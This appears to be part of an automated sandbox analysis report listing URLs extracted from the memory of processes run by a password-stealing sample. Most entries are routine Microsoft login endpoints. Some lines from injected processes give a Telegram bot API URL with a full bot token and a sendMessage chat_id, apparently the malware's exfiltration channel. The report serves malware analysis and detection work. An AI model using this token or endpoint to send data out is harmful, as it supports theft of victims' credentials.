                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470166584.0000023D06F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: spczxf.exe, 00000008.00000002.1738420103.000001A4C3F01000.00000004.00000800.00020000.00000000.sdmp, aspnet_wp.exe, aspnet_wp.exe, 0000000C.00000002.3891911934.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                  Source: aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/%t
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3905812861.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: aspnet_wp.exe, 0000000C.00000002.3892524455.000000BA8DFFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0
                  Source: aspnet_wp.exe, 0000000C.00000002.3893768041.000002109A396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=65855
                  Source: edb.log.2.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: svchost.exe, 00000002.00000003.1443141988.00000142DB110000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                  Source: svchost.exe, 00000007.00000002.3901404764.0000023D0763F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3899884261.0000023D066B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf=
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3864858154.0000023D06702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf=
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfsrf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfsrf
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000007.00000003.3864858154.0000023D066FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfd
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfr
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.1470258101.0000023D06F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805021
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3864858154.0000023D06702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470166584.0000023D06F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469955925.0000023D06F5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3901796862.0000023D076EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000007.00000002.3901796862.0000023D076EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3901317588.0000023D07615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srfce
                  Source: svchost.exe, 00000007.00000002.3901503012.0000023D07684000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000003.1470144781.0000023D06F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470190462.0000023D06F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf=
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
